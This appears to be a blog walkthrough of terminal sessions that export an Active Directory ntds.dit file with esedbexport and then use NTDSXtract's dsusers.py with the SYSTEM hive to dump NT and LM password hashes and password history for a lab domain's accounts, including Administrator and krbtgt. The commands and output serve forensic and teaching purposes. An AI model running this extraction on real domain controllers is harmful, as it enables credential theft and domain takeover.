root@wpad:~/blog/libesedb-20120102# cd esedbtools/
root@wpad:~/blog/libesedb-20120102/esedbtools# ./esedbexport
esedbexport 20120102
Missing source file.
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)Database (EDB) file
Usage: esedbexport [ -c codepage ][ -l logfile ][ -m mode ][ -t target ][ -T table_name ][ -hvV ]source source: the source file
-c: codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h: shows this help -l: logs information about the exported items
-m: export mode, option: all, tables (default)'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t: specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T: exports only a specific table
-v: verbose output to stderr
-V: print version
root@wpad:~/blog/libesedb-20120102/esedbtools#
root@wpad:~/blog/libesedb-20120102/esedbtools# ./esedbexport ../../ntds.dit
esedbexport 20120102
Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
Move the exported tables to somewhere a bit easier:
root@wpad:~/blog# cd NTDSXtract 1.0/
root@wpad:~/blog/NTDSXtract 1.0# ls
dscomputers.py dsdeletedobjects.py dsfileinformation.py dsgroups.py dstimeline.py dsusers.py framework ntds
root@wpad:~/blog/NTDSXtract 1.0# python dsusers.py
DSUsers
Extracts information related to user objects
usage: dsusers.py [option] options:
--rid
List user identified by RID
--name
List user identified by Name
--passwordhashes
Extract password hashes
--passwordhistory
Extract password history --certificates
Extract certificates
--supplcreds
Extract kerberos keys
--membership
List groups of which the user is a member
root@wpad:~/blog/NTDSXtract 1.0#
root@wpad:~/blog/NTDSXtract 1.0# python dsusers.py ../ntds.dit.export/datatable.3 ../ntds.dit.export/link_table.5 --passwordhashes ../SYSTEM.hive --passwordhistory ../SYSTEM.hive
Running with options:
Extracting password hashes
Extracting password historyInitialising engine...
Scanning database - 100% -> 3475 records processed
Extracting schema information - 100% -> 1549 records processed
Extracting object links...
List of users:
==============Record ID: 3562
User name: Administrator
User principal name:
SAM Account name: Administrator
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 7ceee337-fa58-4ca0-9643-540a40161020
SID: S-1-5-21-3825330677-773554443-1603823854-500
When created: 2012-08-22 03:12:59
When changed: 2013-05-15 04:06:55
Account expires: Never
Password last set: 2012-08-22 02:49:42.899576
Last logon: 2013-05-15 04:08:04.547236
Last logon timestamp: 2013-05-15 04:06:55.577353
Bad password time 2013-06-07 02:34:34.560516
Logon count: 9
Bad password count: 1
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ net projectmentor Users Administrator
Password hashes:
Administrator:$NT$88e4d9fabaecf3ded18dd80905521b29:::
Password history:
Record ID: 3563
User name: Guest
User principal name:
SAM Account name: Guest
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 659723d7-1246-4959-b0fc-af80ea5e3816
SID: S-1-5-21-3825330677-773554443-1603823854-501
When created: 2012-08-22 03:12:59
When changed: 2013-03-14 06:54:22
Account expires: Never
Password last set: 2013-03-14 06:54:22.029303
Last logon: 2013-03-14 06:54:27.012817
Last logon timestamp: 2013-03-14 06:32:41.834022
Bad password time 2013-06-07 03:07:46.499917
Logon count: 0
Bad password count: 10
User Account Control:
PWD Not Required
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ net projectmentor Users Guest
Password hashes:
Guest:$NT$823893adfad2ada6e1a414f3ebdf58f7:::
Password history:
Record ID: 3564
User name: user
User principal name:
SAM Account name: user
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: c5a5c87a-93b4-4d80-97a1-1c605b9b0c03
SID: S-1-5-21-3825330677-773554443-1603823854-1000
When created: 2012-08-22 03:12:59
When changed: 2013-06-07 02:51:54
Account expires: Never
Password last set: 2013-03-14 03:25:11.793912
Last logon: 2013-06-07 02:51:54.152191
Last logon timestamp: 2013-06-07 02:51:54.152191
Bad password time 2013-04-19 05:25:40.412670
Logon count: 67
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ net projectmentor Users user
Password hashes:
user:$NT$88e4d9fabaecf3dec18dd80905521b29:::
Password history:
user_nthistory0:$NT$88e4d9fabafcf3dec18dd80905521b29:::
user_nthistory1:$NT$0c61031f010b2fbb88fe449fbf262477:::
user_nthistory2:$NT$88e4dffabaecf3dec18dd80905521b29:::
user_lmhistory0:c869027e01c3c4fe7626a90c87cc7fed:::
user_lmhistory1:8be023cd858da1edd21b94907afe182c:::
Record ID: 3610
User name: krbtgt
User principal name:
SAM Account name: krbtgt
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 74e6bd0b-e4d5-42df-98d5-24f9060061c9
SID: S-1-5-21-3825330677-773554443-1603823854-502
When created: 2012-08-22 03:16:03
When changed: 2012-08-22 03:31:13
Account expires: Never
Password last set: 2012-08-22 03:16:03.166457
Last logon: Never
Last logon timestamp: Never
Bad password time Never
Logon count: 0
Bad password count: 0
User Account Control:
Disabled
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ net projectmentor Users krbtgt
Password hashes:
krbtgt:$NT$7253e8647254716b507a2dcb149ff2da:::
Password history:
krbtgt_nthistory0:$NT$7253e86a7254716a507a2dcb149ff2da:::
krbtgt_lmhistory0:113926e06a31d182623633041b632929:::
Record ID: 3762
User name: John Doe
User principal name: jdoe@projectmentor.net
SAM Account name: jdoe
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: bbf24c63-39a9-4cc4-8aa8-933f9ddee940
SID: S-1-5-21-3825330677-773554443-1603823854-1104
When created: 2012-08-22 04:10:52
When changed: 2013-06-05 13:04:11
Account expires: Never
Password last set: 2013-04-19 07:11:49.849592
Last logon: 2013-06-07 02:56:25.677855
Last logon timestamp: 2013-06-05 13:04:11.674344
Bad password time 2013-05-02 03:01:12.536251
Logon count: 242
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ net projectmentor Users John Doe
Password hashes:
John Doe:$NT$88e4d9fabaecf3ded18dd80905511b29:::
Password history:
Record ID: 3797
User name: Random User
User principal name: randy@projectmentor.net
SAM Account name: randy
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 2701eb29-628a-4568-a093-d33a7db10d04
SID: S-1-5-21-3825330677-773554443-1603823854-1108
When created: 2013-04-08 02:34:04
When changed: 2013-05-27 16:06:07
Account expires: Never
Password last set: 2013-04-19 06:59:25.423280
Last logon: 2013-04-08 02:34:10.482690
Last logon timestamp: 2013-04-08 02:34:10.482690
Bad password time Never
Logon count: 1
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ net projectmentor Users Random User
Password hashes:
Random User:$NT$88ead9fa5aecf3dec18dd80905521b29:::
Password history:
root@wpad:~/blog/NTDSXtract 1.0#